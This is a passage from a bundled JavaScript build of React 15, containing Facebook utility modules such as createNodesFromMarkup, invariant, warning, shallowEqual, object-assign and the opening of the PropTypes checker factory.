Fall back to copying key by key. This assumes all keys have a value,\n  // so will not preserve sparsely populated inputs.\n  var ret = Array(length);\n  for (var ii = 0; ii < length; ii++) {\n    ret[ii] = obj[ii];\n  }\n  return ret;\n}\n\n/**\n * Perform a heuristic test to determine if an object is \"array-like\".\n *\n *   A monk asked Joshu, a Zen master, \"Has a dog Buddha nature?\"\n *   Joshu replied: \"Mu.\"\n *\n * This function determines if its argument has \"array nature\": it returns\n * true if the argument is an actual array, an `arguments' object, or an\n * HTMLCollection (e.g. node.childNodes or node.getElementsByTagName()).\n *\n * It will return false for other array-like objects like Filelist.\n *\n * @param {*} obj\n * @return {boolean}\n */\nfunction hasArrayNature(obj) {\n  return (\n    // not null/false\n    !!obj && (\n    // arrays are objects, NodeLists are functions in Safari\n    typeof obj == 'object' || typeof obj == 'function') &&\n    // quacks like an array\n    'length' in obj &&\n    // not window\n    !('setInterval' in obj) &&\n    // no DOM node should be considered an array-like\n    // a 'select' element has 'length' and 'item' properties on IE8\n    typeof obj.nodeType != 'number' && (\n    // a real array\n    Array.isArray(obj) ||\n    // arguments\n    'callee' in obj ||\n    // HTMLCollection/NodeList\n    'item' in obj)\n  );\n}\n\n/**\n * Ensure that the argument is an array by wrapping it in an array if it is not.\n * Creates a copy of the argument if it is already an array.\n *\n * This is mostly useful idiomatically:\n *\n *   var createArrayFromMixed = require('createArrayFromMixed');\n *\n *   function takesOneOrMoreThings(things) {\n *     things = createArrayFromMixed(things);\n *     ...\n *   }\n *\n * This allows you to treat `things' as an array, but accept scalars in the API.\n *\n * If you need to convert an array-like object, like `arguments`, into an array\n * use toArray instead.\n *\n * @param {*} obj\n * @return {array}\n */\nfunction createArrayFromMixed(obj) {\n  if (!hasArrayNature(obj)) {\n    return [obj];\n  } else if (Array.isArray(obj)) {\n    return obj.slice();\n  } else {\n    return toArray(obj);\n  }\n}\n\nmodule.exports = createArrayFromMixed;\n},{\"152\":152}],143:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n/*eslint-disable fb-www/unsafe-html*/\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar createArrayFromMixed = _dereq_(142);\nvar getMarkupWrap = _dereq_(148);\nvar invariant = _dereq_(152);\n\n/**\n * Dummy container used to render all markup.\n */\nvar dummyNode = ExecutionEnvironment.canUseDOM ? document.createElement('div') : null;\n\n/**\n * Pattern used by `getNodeName`.\n */\nvar nodeNamePattern = /^\\s*<(\\w+)/;\n\n/**\n * Extracts the `nodeName` of the first element in a string of markup.\n *\n * @param {string} markup String of markup.\n * @return {?string} Node name of the supplied markup.\n */\nfunction getNodeName(markup) {\n  var nodeNameMatch = markup.match(nodeNamePattern);\n  return nodeNameMatch && nodeNameMatch[1].toLowerCase();\n}\n\n/**\n * Creates an array containing the nodes rendered from the supplied markup. The\n * optionally supplied `handleScript` function will be invoked once for each\n * <script> element that is rendered. If no `handleScript` function is supplied,\n * an exception is thrown if any <script> elements are rendered.\n *\n * @param {string} markup A string of valid HTML markup.\n * @param {?function} handleScript Invoked once for each rendered <script>.\n * @return {array<DOMElement|DOMTextNode>} An array of rendered nodes.\n */\nfunction createNodesFromMarkup(markup, handleScript) {\n  var node = dummyNode;\n  !!!dummyNode ? \"development\" !== 'production' ? invariant(false, 'createNodesFromMarkup dummy not initialized') : invariant(false) : void 0;\n  var nodeName = getNodeName(markup);\n\n  var wrap = nodeName && getMarkupWrap(nodeName);\n  if (wrap) {\n    node.innerHTML = wrap[1] + markup + wrap[2];\n\n    var wrapDepth = wrap[0];\n    while (wrapDepth--) {\n      node = node.lastChild;\n    }\n  } else {\n    node.innerHTML = markup;\n  }\n\n  var scripts = node.getElementsByTagName('script');\n  if (scripts.length) {\n    !handleScript ? \"development\" !== 'production' ? invariant(false, 'createNodesFromMarkup(...): Unexpected <script> element rendered.') : invariant(false) : void 0;\n    createArrayFromMixed(scripts).forEach(handleScript);\n  }\n\n  var nodes = Array.from(node.childNodes);\n  while (node.lastChild) {\n    node.removeChild(node.lastChild);\n  }\n  return nodes;\n}\n\nmodule.exports = createNodesFromMarkup;\n},{\"138\":138,\"142\":142,\"148\":148,\"152\":152}],144:[function(_dereq_,module,exports){\n\"use strict\";\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\nfunction makeEmptyFunction(arg) {\n  return function () {\n    return arg;\n  };\n}\n\n/**\n * This function accepts and discards inputs; it has no side effects. This is\n * primarily useful idiomatically for overridable function endpoints which\n * always need to be callable, since JS lacks a null-call idiom ala Cocoa.\n */\nvar emptyFunction = function emptyFunction() {};\n\nemptyFunction.thatReturns = makeEmptyFunction;\nemptyFunction.thatReturnsFalse = makeEmptyFunction(false);\nemptyFunction.thatReturnsTrue = makeEmptyFunction(true);\nemptyFunction.thatReturnsNull = makeEmptyFunction(null);\nemptyFunction.thatReturnsThis = function () {\n  return this;\n};\nemptyFunction.thatReturnsArgument = function (arg) {\n  return arg;\n};\n\nmodule.exports = emptyFunction;\n},{}],145:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar emptyObject = {};\n\nif (\"development\" !== 'production') {\n  Object.freeze(emptyObject);\n}\n\nmodule.exports = emptyObject;\n},{}],146:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * @param {DOMElement} node input/textarea to focus\n */\n\nfunction focusNode(node) {\n  // IE8 can throw \"Can't move focus to the control because it is invisible,\n  // not enabled, or of a type that does not accept the focus.\" for all kinds of\n  // reasons that are too expensive and fragile to test.\n  try {\n    node.focus();\n  } catch (e) {}\n}\n\nmodule.exports = focusNode;\n},{}],147:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n/* eslint-disable fb-www/typeof-undefined */\n\n/**\n * Same as document.activeElement but wraps in a try-catch block. In IE it is\n * not safe to call document.activeElement if there is nothing focused.\n *\n * The activeElement will be null only if the document or document body is not\n * yet defined.\n *\n * @param {?DOMDocument} doc Defaults to current document.\n * @return {?DOMElement}\n */\nfunction getActiveElement(doc) /*?DOMElement*/{\n  doc = doc || (typeof document !== 'undefined' ? document : undefined);\n  if (typeof doc === 'undefined') {\n    return null;\n  }\n  try {\n    return doc.activeElement || doc.body;\n  } catch (e) {\n    return doc.body;\n  }\n}\n\nmodule.exports = getActiveElement;\n},{}],148:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n/*eslint-disable fb-www/unsafe-html */\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar invariant = _dereq_(152);\n\n/**\n * Dummy container used to detect which wraps are necessary.\n */\nvar dummyNode = ExecutionEnvironment.canUseDOM ? document.createElement('div') : null;\n\n/**\n * Some browsers cannot use `innerHTML` to render certain elements standalone,\n * so we wrap them, render the wrapped nodes, then extract the desired node.\n *\n * In IE8, certain elements cannot render alone, so wrap all elements ('*').\n */\n\nvar shouldWrap = {};\n\nvar selectWrap = [1, '<select multiple=\"true\">', '</select>'];\nvar tableWrap = [1, '<table>', '</table>'];\nvar trWrap = [3, '<table><tbody><tr>', '</tr></tbody></table>'];\n\nvar svgWrap = [1, '<svg xmlns=\"http://www.w3.org/2000/svg\">', '</svg>'];\n\nvar markupWrap = {\n  '*': [1, '?<div>', '</div>'],\n\n  'area': [1, '<map>', '</map>'],\n  'col': [2, '<table><tbody></tbody><colgroup>', '</colgroup></table>'],\n  'legend': [1, '<fieldset>', '</fieldset>'],\n  'param': [1, '<object>', '</object>'],\n  'tr': [2, '<table><tbody>', '</tbody></table>'],\n\n  'optgroup': selectWrap,\n  'option': selectWrap,\n\n  'caption': tableWrap,\n  'colgroup': tableWrap,\n  'tbody': tableWrap,\n  'tfoot': tableWrap,\n  'thead': tableWrap,\n\n  'td': trWrap,\n  'th': trWrap\n};\n\n// Initialize the SVG elements since we know they'll always need to be wrapped\n// consistently. If they are created inside a <div> they will be initialized in\n// the wrong namespace (and will not display).\nvar svgElements = ['circle', 'clipPath', 'defs', 'ellipse', 'g', 'image', 'line', 'linearGradient', 'mask', 'path', 'pattern', 'polygon', 'polyline', 'radialGradient', 'rect', 'stop', 'text', 'tspan'];\nsvgElements.forEach(function (nodeName) {\n  markupWrap[nodeName] = svgWrap;\n  shouldWrap[nodeName] = true;\n});\n\n/**\n * Gets the markup wrap configuration for the supplied `nodeName`.\n *\n * NOTE: This lazily detects which wraps are necessary for the current browser.\n *\n * @param {string} nodeName Lowercase `nodeName`.\n * @return {?array} Markup wrap configuration, if applicable.\n */\nfunction getMarkupWrap(nodeName) {\n  !!!dummyNode ? \"development\" !== 'production' ? invariant(false, 'Markup wrapping node not initialized') : invariant(false) : void 0;\n  if (!markupWrap.hasOwnProperty(nodeName)) {\n    nodeName = '*';\n  }\n  if (!shouldWrap.hasOwnProperty(nodeName)) {\n    if (nodeName === '*') {\n      dummyNode.innerHTML = '<link />';\n    } else {\n      dummyNode.innerHTML = '<' + nodeName + '></' + nodeName + '>';\n    }\n    shouldWrap[nodeName] = !dummyNode.firstChild;\n  }\n  return shouldWrap[nodeName] ? markupWrap[nodeName] : null;\n}\n\nmodule.exports = getMarkupWrap;\n},{\"138\":138,\"152\":152}],149:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n'use strict';\n\n/**\n * Gets the scroll position of the supplied element or window.\n *\n * The return values are unbounded, unlike `getScrollPosition`. This means they\n * may be negative or exceed the element boundaries (which is possible using\n * inertial scrolling).\n *\n * @param {DOMWindow|DOMElement} scrollable\n * @return {object} Map with `x` and `y` keys.\n */\n\nfunction getUnboundedScrollPosition(scrollable) {\n  if (scrollable.Window && scrollable instanceof scrollable.Window) {\n    return {\n      x: scrollable.pageXOffset || scrollable.document.documentElement.scrollLeft,\n      y: scrollable.pageYOffset || scrollable.document.documentElement.scrollTop\n    };\n  }\n  return {\n    x: scrollable.scrollLeft,\n    y: scrollable.scrollTop\n  };\n}\n\nmodule.exports = getUnboundedScrollPosition;\n},{}],150:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\nvar _uppercasePattern = /([A-Z])/g;\n\n/**\n * Hyphenates a camelcased string, for example:\n *\n *   > hyphenate('backgroundColor')\n *   < \"background-color\"\n *\n * For CSS style names, use `hyphenateStyleName` instead which works properly\n * with all vendor prefixes, including `ms`.\n *\n * @param {string} string\n * @return {string}\n */\nfunction hyphenate(string) {\n  return string.replace(_uppercasePattern, '-$1').toLowerCase();\n}\n\nmodule.exports = hyphenate;\n},{}],151:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n'use strict';\n\nvar hyphenate = _dereq_(150);\n\nvar msPattern = /^ms-/;\n\n/**\n * Hyphenates a camelcased CSS property name, for example:\n *\n *   > hyphenateStyleName('backgroundColor')\n *   < \"background-color\"\n *   > hyphenateStyleName('MozTransition')\n *   < \"-moz-transition\"\n *   > hyphenateStyleName('msTransition')\n *   < \"-ms-transition\"\n *\n * As Modernizr suggests (http://modernizr.com/docs/#prefixed), an `ms` prefix\n * is converted to `-ms-`.\n *\n * @param {string} string\n * @return {string}\n */\nfunction hyphenateStyleName(string) {\n  return hyphenate(string).replace(msPattern, '-ms-');\n}\n\nmodule.exports = hyphenateStyleName;\n},{\"150\":150}],152:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Use invariant() to assert state which your program assumes to be true.\n *\n * Provide sprintf-style format (only %s is supported) and arguments\n * to provide information about what broke and what you were\n * expecting.\n *\n * The invariant message will be stripped in production, but the invariant\n * will remain to ensure logic does not differ in production.\n */\n\nvar validateFormat = function validateFormat(format) {};\n\nif (\"development\" !== 'production') {\n  validateFormat = function validateFormat(format) {\n    if (format === undefined) {\n      throw new Error('invariant requires an error message argument');\n    }\n  };\n}\n\nfunction invariant(condition, format, a, b, c, d, e, f) {\n  validateFormat(format);\n\n  if (!condition) {\n    var error;\n    if (format === undefined) {\n      error = new Error('Minified exception occurred; use the non-minified dev environment ' + 'for the full error message and additional helpful warnings.');\n    } else {\n      var args = [a, b, c, d, e, f];\n      var argIndex = 0;\n      error = new Error(format.replace(/%s/g, function () {\n        return args[argIndex++];\n      }));\n      error.name = 'Invariant Violation';\n    }\n\n    error.framesToPop = 1; // we don't care about invariant's own frame\n    throw error;\n  }\n}\n\nmodule.exports = invariant;\n},{}],153:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n/**\n * @param {*} object The object to check.\n * @return {boolean} Whether or not the object is a DOM node.\n */\nfunction isNode(object) {\n  var doc = object ? object.ownerDocument || object : document;\n  var defaultView = doc.defaultView || window;\n  return !!(object && (typeof defaultView.Node === 'function' ? object instanceof defaultView.Node : typeof object === 'object' && typeof object.nodeType === 'number' && typeof object.nodeName === 'string'));\n}\n\nmodule.exports = isNode;\n},{}],154:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\nvar isNode = _dereq_(153);\n\n/**\n * @param {*} object The object to check.\n * @return {boolean} Whether or not the object is a DOM text node.\n */\nfunction isTextNode(object) {\n  return isNode(object) && object.nodeType == 3;\n}\n\nmodule.exports = isTextNode;\n},{\"153\":153}],155:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n * @typechecks static-only\n */\n\n'use strict';\n\n/**\n * Memoizes the return value of a function that accepts one string argument.\n */\n\nfunction memoizeStringOnly(callback) {\n  var cache = {};\n  return function (string) {\n    if (!cache.hasOwnProperty(string)) {\n      cache[string] = callback.call(this, string);\n    }\n    return cache[string];\n  };\n}\n\nmodule.exports = memoizeStringOnly;\n},{}],156:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar performance;\n\nif (ExecutionEnvironment.canUseDOM) {\n  performance = window.performance || window.msPerformance || window.webkitPerformance;\n}\n\nmodule.exports = performance || {};\n},{\"138\":138}],157:[function(_dereq_,module,exports){\n'use strict';\n\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n */\n\nvar performance = _dereq_(156);\n\nvar performanceNow;\n\n/**\n * Detect if we can use `window.performance.now()` and gracefully fallback to\n * `Date.now()` if it doesn't exist. We need to support Firefox < 15 for now\n * because of Facebook's testing infrastructure.\n */\nif (performance.now) {\n  performanceNow = function performanceNow() {\n    return performance.now();\n  };\n} else {\n  performanceNow = function performanceNow() {\n    return Date.now();\n  };\n}\n\nmodule.exports = performanceNow;\n},{\"156\":156}],158:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * @typechecks\n * \n */\n\n/*eslint-disable no-self-compare */\n\n'use strict';\n\nvar hasOwnProperty = Object.prototype.hasOwnProperty;\n\n/**\n * inlined Object.is polyfill to avoid requiring consumers ship their own\n * https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/is\n */\nfunction is(x, y) {\n  // SameValue algorithm\n  if (x === y) {\n    // Steps 1-5, 7-10\n    // Steps 6.b-6.e: +0 != -0\n    // Added the nonzero y check to make Flow happy, but it is redundant\n    return x !== 0 || y !== 0 || 1 / x === 1 / y;\n  } else {\n    // Step 6.a: NaN == NaN\n    return x !== x && y !== y;\n  }\n}\n\n/**\n * Performs equality by iterating through keys on an object and returning false\n * when any key has values which are not strictly equal between the arguments.\n * Returns true when the values of all keys are strictly equal.\n */\nfunction shallowEqual(objA, objB) {\n  if (is(objA, objB)) {\n    return true;\n  }\n\n  if (typeof objA !== 'object' || objA === null || typeof objB !== 'object' || objB === null) {\n    return false;\n  }\n\n  var keysA = Object.keys(objA);\n  var keysB = Object.keys(objB);\n\n  if (keysA.length !== keysB.length) {\n    return false;\n  }\n\n  // Test for A's keys different from B.\n  for (var i = 0; i < keysA.length; i++) {\n    if (!hasOwnProperty.call(objB, keysA[i]) || !is(objA[keysA[i]], objB[keysA[i]])) {\n      return false;\n    }\n  }\n\n  return true;\n}\n\nmodule.exports = shallowEqual;\n},{}],159:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-2015, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar emptyFunction = _dereq_(144);\n\n/**\n * Similar to invariant but only logs a warning if the condition is not met.\n * This can be used to log issues in development environments in critical\n * paths. Removing the logging code for production environments will keep the\n * same logic and follow the same code paths.\n */\n\nvar warning = emptyFunction;\n\nif (\"development\" !== 'production') {\n  (function () {\n    var printWarning = function printWarning(format) {\n      for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {\n        args[_key - 1] = arguments[_key];\n      }\n\n      var argIndex = 0;\n      var message = 'Warning: ' + format.replace(/%s/g, function () {\n        return args[argIndex++];\n      });\n      if (typeof console !== 'undefined') {\n        console.error(message);\n      }\n      try {\n        // --- Welcome to debugging React ---\n        // This error was thrown as a convenience so that you can use this stack\n        // to find the callsite that caused this warning to fire.\n        throw new Error(message);\n      } catch (x) {}\n    };\n\n    warning = function warning(condition, format) {\n      if (format === undefined) {\n        throw new Error('`warning(condition, format, ...args)` requires a warning ' + 'message argument');\n      }\n\n      if (format.indexOf('Failed Composite propType: ') === 0) {\n        return; // Ignore CompositeComponent proptype check.\n      }\n\n      if (!condition) {\n        for (var _len2 = arguments.length, args = Array(_len2 > 2 ? _len2 - 2 : 0), _key2 = 2; _key2 < _len2; _key2++) {\n          args[_key2 - 2] = arguments[_key2];\n        }\n\n        printWarning.apply(undefined, [format].concat(args));\n      }\n    };\n  })();\n}\n\nmodule.exports = warning;\n},{\"144\":144}],160:[function(_dereq_,module,exports){\n/*\nobject-assign\n(c) Sindre Sorhus\n@license MIT\n*/\n\n'use strict';\n/* eslint-disable no-unused-vars */\nvar getOwnPropertySymbols = Object.getOwnPropertySymbols;\nvar hasOwnProperty = Object.prototype.hasOwnProperty;\nvar propIsEnumerable = Object.prototype.propertyIsEnumerable;\n\nfunction toObject(val) {\n\tif (val === null || val === undefined) {\n\t\tthrow new TypeError('Object.assign cannot be called with null or undefined');\n\t}\n\n\treturn Object(val);\n}\n\nfunction shouldUseNative() {\n\ttry {\n\t\tif (!Object.assign) {\n\t\t\treturn false;\n\t\t}\n\n\t\t// Detect buggy property enumeration order in older V8 versions.\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=4118\n\t\tvar test1 = new String('abc');  // eslint-disable-line no-new-wrappers\n\t\ttest1[5] = 'de';\n\t\tif (Object.getOwnPropertyNames(test1)[0] === '5') {\n\t\t\treturn false;\n\t\t}\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=3056\n\t\tvar test2 = {};\n\t\tfor (var i = 0; i < 10; i++) {\n\t\t\ttest2['_' + String.fromCharCode(i)] = i;\n\t\t}\n\t\tvar order2 = Object.getOwnPropertyNames(test2).map(function (n) {\n\t\t\treturn test2[n];\n\t\t});\n\t\tif (order2.join('') !== '0123456789') {\n\t\t\treturn false;\n\t\t}\n\n\t\t// https://bugs.chromium.org/p/v8/issues/detail?id=3056\n\t\tvar test3 = {};\n\t\t'abcdefghijklmnopqrst'.split('').forEach(function (letter) {\n\t\t\ttest3[letter] = letter;\n\t\t});\n\t\tif (Object.keys(Object.assign({}, test3)).join('') !==\n\t\t\t\t'abcdefghijklmnopqrst') {\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t} catch (err) {\n\t\t// We don't expect any of the above to throw, but better to be safe.\n\t\treturn false;\n\t}\n}\n\nmodule.exports = shouldUseNative() ? Object.assign : function (target, source) {\n\tvar from;\n\tvar to = toObject(target);\n\tvar symbols;\n\n\tfor (var s = 1; s < arguments.length; s++) {\n\t\tfrom = Object(arguments[s]);\n\n\t\tfor (var key in from) {\n\t\t\tif (hasOwnProperty.call(from, key)) {\n\t\t\t\tto[key] = from[key];\n\t\t\t}\n\t\t}\n\n\t\tif (getOwnPropertySymbols) {\n\t\t\tsymbols = getOwnPropertySymbols(from);\n\t\t\tfor (var i = 0; i < symbols.length; i++) {\n\t\t\t\tif (propIsEnumerable.call(from, symbols[i])) {\n\t\t\t\t\tto[symbols[i]] = from[symbols[i]];\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn to;\n};\n\n},{}],161:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nif (\"development\" !== 'production') {\n  var invariant = _dereq_(152);\n  var warning = _dereq_(159);\n  var ReactPropTypesSecret = _dereq_(164);\n  var loggedTypeFailures = {};\n}\n\n/**\n * Assert that the values match with the type specs.\n * Error messages are memorized and will only be shown once.\n *\n * @param {object} typeSpecs Map of name to a ReactPropType\n * @param {object} values Runtime values that need to be type-checked\n * @param {string} location e.g. \"prop\", \"context\", \"child context\"\n * @param {string} componentName Name of the component for error messages.\n * @param {?Function} getStack Returns the component stack.\n * @private\n */\nfunction checkPropTypes(typeSpecs, values, location, componentName, getStack) {\n  if (\"development\" !== 'production') {\n    for (var typeSpecName in typeSpecs) {\n      if (typeSpecs.hasOwnProperty(typeSpecName)) {\n        var error;\n        // Prop type validation may throw. In case they do, we don't want to\n        // fail the render phase where it didn't fail before. So we log it.\n        // After these have been cleaned up, we'll let them throw.\n        try {\n          // This is intentionally an invariant that gets caught. It's the same\n          // behavior as without this statement except with a better message.\n          invariant(typeof typeSpecs[typeSpecName] === 'function', '%s: %s type `%s` is invalid; it must be a function, usually from ' + 'React.PropTypes.', componentName || 'React class', location, typeSpecName);\n          error = typeSpecs[typeSpecName](values, typeSpecName, componentName, location, null, ReactPropTypesSecret);\n        } catch (ex) {\n          error = ex;\n        }\n        warning(!error || error instanceof Error, '%s: type specification of %s `%s` is invalid; the type checker ' + 'function must return `null` or an `Error` but returned a %s. ' + 'You may have forgotten to pass an argument to the type checker ' + 'creator (arrayOf, instanceOf, objectOf, oneOf, oneOfType, and ' + 'shape all require an argument).', componentName || 'React class', location, typeSpecName, typeof error);\n        if (error instanceof Error && !(error.message in loggedTypeFailures)) {\n          // Only monitor this failure once because there tends to be a lot of the\n          // same error.\n          loggedTypeFailures[error.message] = true;\n\n          var stack = getStack ? getStack() : '';\n\n          warning(false, 'Failed %s type: %s%s', location, error.message, stack != null ? stack : '');\n        }\n      }\n    }\n  }\n}\n\nmodule.exports = checkPropTypes;\n\n},{\"152\":152,\"159\":159,\"164\":164}],162:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\n// React 15.5 references this module, and assumes PropTypes are still callable in production.\n// Therefore we re-export development-only version with all the PropTypes checks here.\n// However if one is migrating to the `prop-types` npm library, they will go through the\n// `index.js` entry point, and it will branch depending on the environment.\nvar factory = _dereq_(163);\nmodule.exports = function(isValidElement) {\n  // It is still allowed in 15.5.\n  var throwOnDirectAccess = false;\n  return factory(isValidElement, throwOnDirectAccess);\n};\n\n},{\"163\":163}],163:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nvar emptyFunction = _dereq_(144);\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar ReactPropTypesSecret = _dereq_(164);\nvar checkPropTypes = _dereq_(161);\n\nmodule.exports = function(isValidElement, throwOnDirectAccess) {\n  /* global Symbol */\n  var ITERATOR_SYMBOL = typeof Symbol === 'function' && Symbol.iterator;\n  var FAUX_ITERATOR_SYMBOL = '@@iterator'; // Before Symbol spec.\n\n  /**\n   * Returns the iterator method function contained on the iterable object.\n   *\n   * Be sure to invoke the function with the iterable as context:\n   *\n   *     var iteratorFn = getIteratorFn(myIterable);\n   *     if (iteratorFn) {\n   *       var iterator = iteratorFn.call(myIterable);\n   *       ...\n   *     }\n   *\n   * @param {?object} maybeIterable\n   * @return {?function}\n   */\n  function getIteratorFn(maybeIterable) {\n    var iteratorFn = maybeIterable && (ITERATOR_SYMBOL && maybeIterable[ITERATOR_SYMBOL] || maybeIterable[FAUX_ITERATOR_SYMBOL]);\n    if (typeof iteratorFn === 'function') {\n      return iteratorFn;\n    }\n  }\n\n  /**\n   * Collection of methods that allow declaration and validation of props that are\n   * supplied to React components. Example usage:\n   *\n   *   var Props = require('ReactPropTypes');\n   *   var MyArticle = React.createClass({\n   *     propTypes: {\n   *       // An optional string prop named \"description\".\n   *       description: Props.string,\n   *\n   *       // A required enum prop named \"category\".\n   *       category: Props.oneOf(['News','Photos']).isRequired,\n   *\n   *       // A prop named \"dialog\" that requires an instance of Dialog.\n   *       dialog: Props.instanceOf(Dialog).isRequired\n   *     },\n   *     render: function() { ... }\n   *   });\n   *\n   * A more formal specification of how these methods are used:\n   *\n   *   type := array|bool|func|object|number|string|oneOf([...])|instanceOf(...)\n   *   decl := ReactPropTypes.{type}(.isRequired)?\n   *\n   * Each and every declaration produces a function with the same signature. This\n   * allows the creation of custom validation functions. For example:\n   *\n   *  var MyLink = React.createClass({\n   *    propTypes: {\n   *      // An optional string or URI prop named \"href\".\n   *      href: function(props, propName, componentName) {\n   *        var propValue = props[propName];\n   *        if (propValue != null && typeof propValue !== 'string' &&\n   *            !(propValue instanceof URI)) {\n   *          return new Error(\n   *            'Expected a string or an URI for ' + propName + ' in ' +\n   *            componentName\n   *          );\n   *        }\n   *      }\n   *    },\n   *    render: function() {...}\n   *  });\n   *\n   * @internal\n   */\n\n  var ANONYMOUS = '<<anonymous>>';\n\n  // Important!\n  // Keep this list in sync with production version in `./factoryWithThrowingShims.js`.\n  var ReactPropTypes = {\n    array: createPrimitiveTypeChecker('array'),\n    bool: createPrimitiveTypeChecker('boolean'),\n    func: createPrimitiveTypeChecker('function'),\n    number: createPrimitiveTypeChecker('number'),\n    object: createPrimitiveTypeChecker('object'),\n    string: createPrimitiveTypeChecker('string'),\n    symbol: createPrimitiveTypeChecker('symbol'),\n\n    any: 